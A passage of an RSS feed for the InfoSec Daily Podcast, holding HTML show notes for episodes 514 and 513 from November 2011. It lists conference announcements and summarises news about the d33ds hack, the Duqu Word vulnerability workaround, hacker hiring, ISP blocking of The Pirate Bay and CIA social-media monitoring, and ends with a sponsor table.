	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories:</span><br />
	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><a href="http://www.net-security.org/secworld.php?id=11894"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.net-security.org/secworld.php?id=11894</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker&#39;s pay-walled site on which he offers administrative access to a number of military, education and government websites for sale, has been hacked by a rival hacking group that goes by the name &quot;d33ds&quot;.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The fact was revealed by researchers of security company Imperva, who have discovered &quot;Srblche&quot;&#39;s (the hacker&#39;s) website back in January and wrote about it, prompting him (or her?) to put the site behind a paywall and ask users to pay $10 ($30 according to d33ds) to access the website and the information on the vulnerabilities that will allow them to compromise the aforementioned sites.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Anyone willing to pay for this service must be as stupid as he is,&quot; commented the group, and </span><a href="http://pastebin.com/wtQGsHrX"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">posted</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> information about the server hosting the site, the hacker&#39;s admin login credentials (in plain text), and hashes of his customers&#39; passwords. </span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Imperva&#39;s researchers speculate that the group has managed to access Srblche&#39;s application source files by compromising other applications hosted on the same server as his site &#8211; a method that worked for them well when they attacked and defaced the Rankmyhack website in August this year.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://www.thinq.co.uk/2011/11/4/microsoft-outs-temporary-fix-duqu-word-exploit"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/4/microsoft-outs-temporary-fix-duqu-word-exploit</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Microsoft has released a temporary &#39;fix&#39; for a vulnerability in its Word software that has led to users being infected by the Duqu Trojan.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The software giant has </span><a href="http://blogs.technet.com/b/msrc/archive/2011/11/03/microsoft-releases-security-advisory-2639658.aspx"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">confirmed</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that the security exploit was caused by a previously unknown flaw [ ] in its Win32k Truetype font parsing engine.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As yet, the company has only issued a temporary workaround, which can be downloaded </span><a href="http://support.microsoft.com/fixit/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and prevents the exploit from working.Microsoft admits, however, that the quick fix may cause some documents to display incorrectly.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Engineers are said to be working on a permanent fix to the problem &#8211; but Microsoft said the solution was unlikely to be ready this month, and did not offer a release date.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Microsoft&#39;s advisory, the vulnerability in its code allowed hackers to &quot;install programs; view, change or delete data; or create new accounts with full user rights&quot;, adding: &quot;This vulnerability is related to the Duqu malware.&quot;</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Duqu &#8211; which shows striking similarities to earlier malware Stuxnet &#8211; is believed to be used to identify and steal documents from organisations for the purposes of industrial espionage. It was first reported on Wednesday that the Trojan had spread thanks to a vulnerability in Microsoft Word.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span>&nbsp;<a href="http://nakedsecurity.sophos.com/2011/11/04/hackers-in-the-security-industry"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2011/11/04/hackers-in-the-security-industry</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a recent </span><a href="http://news.bbc.co.uk/1/hi/programmes/click_online/9630072.stm"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">BBC article</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, reputable security firm McAfee is quoted saying, &quot;I&#39;ve never hired computer hackers but that&#39;s not to say I would never do that,&quot; says Raj Samani, chief technical officer of McAfee Europe.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Wow, I thought. Really?</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">OK, I admit, hacker is one those terms whose definitions has blurred in the last decade.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It used to be generally accepted as a term for someone who broke into websites or databases, either to look around, change stuff, steal stuff, infected stuff, etc.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today, its meaning is much broader, but you can generally divide hacker types into three groups. You have bad-ass hackers, referred to as black hats, and the good guys, like penetration testers, called white hats.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And don&#39;t assume for a moment that there is not venn diagram of sorts, with a big fat grey hat area.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hackers here don&#39;t really sit firmly in either camp. Grey hats will typically break into a system, and alert the company to a specific vulnerability that they exploited. But grey hats often go public about the details of the vulnerability, and many argue that this tells black hats how to break in and cause havoc.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Question is should security companies who create and push out software to customers open their doors to people known to have dabbled in grey and black-hat hacking?</span></p>
<p>
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://www.thinq.co.uk/2011/11/4/bt-leaned-block-pirate-bay"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thinq.co.uk/2011/11/4/bt-leaned-block-pirate-bay</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BT is under presure to block access to fil-sharing directory The Pirate Bay, just days after a High court ruling saw the UK&#39;s biggest ISP forced to block access to Usenet search site Newzbin 2 &#8211; a move that appears to have met with limited success.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, in a landmarkruling by, the UK courts accepted the principle that ISPs should be made to police their susbcribers by blocking access to websites accused of infringing copyright.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">With that legal precedent in mind, the British Phonographic Industry ( BPI) &#8211; an organisation representing record labels and other music rights holders &#8211; has asked BT to block access to The Pirate Bay voluntarily, reports </span><a href="http://www.guardian.co.uk/technology/2011/nov/04/bt-pressure-block-pirate-bay"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">The Guardian</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &#8211; though the threat of legal compulsion &nbsp;hangs in the air.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A BT spokesman said: &quot;We can confirm we are now in receipt of a letter from the BPI [ requesting that BT block the Pirate Bay site].&quot;</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BT says it is considering its response.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The ISP finds itself between a a rock and a hard place: under the trheat of legal sanction, but unwilling to anger existing customers by imposing limits on the content they can access, for fear they&#39;ll jump ship and head for smaller ISPs that have not yet been subject to the same pressure.</span></p>
<p>
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span>&nbsp;<a href="http://threatpost.com/en_us/blogs/cia-open-source-center-monitors-analyzes-social-web-110411"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://threatpost.com/en_us/blogs/cia-open-source-center-monitors-analyzes-social-web-110411</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Associated Press published a report today detailing, for the first time, a unit within the CIA, referring to itself as the &lsquo;vengeful librarians,&rsquo; that is responsible for monitoring the vast and various social networks, local and international news, radio, and television, Internet chat rooms, and pretty much anything from which they can procure intelligence.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The unit is part of the CIA&rsquo;s Open Source Center. Their goal is to monitor every facet of the internet in every imaginable language, cross-referencing that information with local news reports and information gleaned in the more traditional, cloak-and-dagger, spy-type espionage. Much of the information,</span><a href="http://www.google.com/hostednews/ap/article/ALeqM5jGuH2XxQaLndlUL9ZyCHrblyaUKA"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">according to the AP</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, ends up in the hands of White House officials and even in President Obama&rsquo;s daily intelligence briefings.</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security experts have long suspected that the growing social net was part of the intelligence community&#39;s open source information gathering. Speaking at the SOURCE Boston conference in 2010, researcher Moxie Marlinspike likened Google&#39;s aggregation of data to the Department of Defense&#39;s now-notorious &quot;Total Information Awareness&quot; plan. However, the report is the first public admission by the CIA that &#8211; yes &#8211; spooks are eyeballing your Tweets and Facebook Wall posts for valuable information. </span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-514-d33ds-duqu-fix-hire-hacker-pirate-bay-cia/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3081/0/infosec-daily-podcast-episode-514.mp3" length="16359276" type="audio/mpeg" />
		<itunes:duration>0:34:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 514 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	Announcements:
	Brad Smith &#34;theNurse&#34; and his stroke at Hacker Halted:
	We all know a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 514 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
	Announcements:
	Brad Smith &#34;theNurse&#34; and his stroke at Hacker Halted:
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	BSidesDFW 2011
	When: November 5th, 2011
	Where:Microsoft Technology Center Dallas
	http://www.securitybsides.com/w/page/36779575/BSidesDFW%202011
	
	2011 Fall Information Security Conference
	When: &#160;November 8 &#8211; 9, 2011
	Where: Atlanta, GA (Loudermilk Conference Center)
	http://www.gaissa.org
	BSides Delaware
	When: November 11-12, 2011
	Where: Wilmington University, Delaware Campus
	http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010
	SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials
	When: Starts November 30, 2011
	Where: Atlanta, GA
	Discount Code: M1011IPAD (free iPad 2)
	http://www.sans.org/mentor/details.php?nid=25504
	You don't have a sufficient version of Flash Player to display this animation.
	Stories:
	Source:http://www.net-security.org/secworld.php?id=11894
	A hacker&#39;s pay-walled site on which he offers administrative access to a number of military, education and government websites for sale, has been hacked by a rival hacking group that goes by the name &#34;d33ds&#34;.
	The fact was revealed by researchers of security company Imperva, who have discovered &#34;Srblche&#34;&#39;s (the hacker&#39;s) website back in January and wrote about it, prompting him (or her?) to put the site behind a paywall and ask users to pay $10 ($30 according to d33ds) to access the website and the information on the vulnerabilities that will allow them to compromise the aforementioned sites.
	&#34;Anyone willing to pay for this service must be as stupid as he is,&#34; commented the group, and posted information about the server hosting the site, the hacker&#39;s admin login credentials (in plain text), and hashes of his customers&#39; passwords. 
	Imperva&#39;s researchers speculate that the group has managed to access Srblche&#39;s application source files by compromising other applications hosted on the same server as his site &#8211; a method that worked for them well when they attacked and defaced the Rankmyhack website in August this year.
	Source: &#160;http://www.thinq.co.uk/2011/11/4/microsoft-outs-temporary-fix-duqu-word-exploit
	Microsoft has released a temporary &#39;fix&#39; for a vulnerability in its Word software that has led to users being infected by the Duqu Trojan.
	The software giant has confirmed that the security exploit was caused by a previously unknown flaw [ ] in its Win32k Truetype font parsing engine.
	As yet, the company has only issued a temporary workaround, which can be downloaded here and prevents the exploit from working.Microsoft admits, however, that the quick fix may cause some documents to display incorrectly.
	Engineers are said to be working on a permanent fix to the problem &#8211; but Microsoft said the solution was unlikely to be ready this month, and did not offer a release date.
	According to Microsoft&#39;s advisory, the vulnerability in its code allowed hackers to &#34;install programs; view, change or delete data; or create new accounts with full user rights&#34;, adding: &#34;This vulnerability is related to the Duqu malware.&#34;
	Duqu &#8211; which shows striking similarities to earlier malware Stuxnet &#8211; i[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 513 &#8211; Live from BSidesATL! Part 2</title>
		<link>http://www.isdpodcast.com/episode-513-live-from-bsidesatl-part-2</link>
		<comments>http://www.isdpodcast.com/episode-513-live-from-bsidesatl-part-2#comments</comments>
		<pubDate>Fri, 04 Nov 2011 18:28:12 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3076</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 513 for November 4, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma. Announcements: Brad smith theNurse and his stroke at Hacker Halted: We all know and love Brad Smith, aka [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 513 for November 4, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Matthew Romanek, Themson Mester, Dr. Bonez, and Varun Sharma.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad smith theNurse and his stroke at Hacker Halted:</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital in a coma for a few days.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:11pt;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2011 Fall Information Security Conference</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 8 &#8211; 9, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA (Loudermilk Conference Center)<br />
	</span><a href="http://www.gaissa.org/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.gaissa.org</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Delaware</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: November 11-12, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Wilmington University, Delaware Campus</span><br />
	<a href="http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/40113309/BSidesDelaware2010</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Forensics 408 &#8211; Computer Forensic Essentials</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts November 30, 2011</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code: M1011IPAD (free iPad 2)</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25504"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25504</span></a></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is a recorded live stream from BSidesLV!</span></p>
<p>
	<span style="font-size:14pt;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sponsors</span><br />
	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To make the very most of this event, we need your help! We currently are looking for sponsors. If you are interested in sponsoring, please contact Nick Owen at nowen at wikidsystems.com or Mary Catherine Petermann at mc at barracuda.com.</span></p>
<p>	<span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We would like to thank the sponsors that have contributed to this year&#39;s event. Without you these events are not possible. THANK YOU! Our current sponsors include:</span></p>
<div dir="ltr">
<table style="border:none;border-collapse:collapse">
<colgroup>
<col width="360" />
<col width="250" /></colgroup>
<tbody>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="135px;" src="https://lh4.googleusercontent.com/QQibViXw0LWhw7BpHNy-mhi_RZNUfhRd5DZrMM2tcidQiuqJrWNI0DDtxo4prTnHE-uFHKaUHzEbebNqwrKHR5NQk3XCB1ok4oBiIMsaSMDY9Pcw70Y" width="137px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We&rsquo;re a curious bunch that makes digital things &mdash; and not just apps or banners or sites. We bring digital to life with integrated solutions that make sense &mdash; for the companies that need them, the users that demand them and the digital world that consumes them.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="107px;" src="https://lh6.googleusercontent.com/ragMJtOWTheH01nk387gLoxRs8K4maytkSDm-6Eob6tSp-pe2OAWz-bGGG2ah-dtjfKCNwMWpkKrws2MJ_nTGoWuSZFSTtjq87oZnjqCdmU0Epr_Jw4" width="263px;" />*</td>
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amidst the growing noise of polarizing security topics, hacking vs compliance religious warfare, and misunderstood risk phobias, VerSprite provides tailored security guidance that supports technology and operational objectives. &nbsp;VerSprite reflects a fresh take on understanding and managing risk around people, process, and technology. &nbsp;Focusing on GRC, AppSec, and BCM solutions, VerSprite&#39;s hybrid approach to InfoSec navigates beyond the super-hyped to a more balanced approach to functional security. Discover more at</span><a href="http://www.versprite.com/"><span style="font-size:11pt;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.versprite.com</span></a><span style="font-size:11pt;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></td>
</tr>
<tr style="height:0px">
<td style="border:1px dotted #aaa;vertical-align:top;padding:7px 7px 7px 7px"><img height="111px;" src="https://lh4.googleusercontent.com/DcO7JVPgea2r3FJQpzMUBlVMLsjMQ-nDxW8HsgmYdSjZVKS1Wnf3tmppQ6FpY20hg_vPgAo5rbt0bFUfeLWj2huSKbxs4g5KU5m4RWyHk0tzmc_ycqA" width="252px;" />*</td>
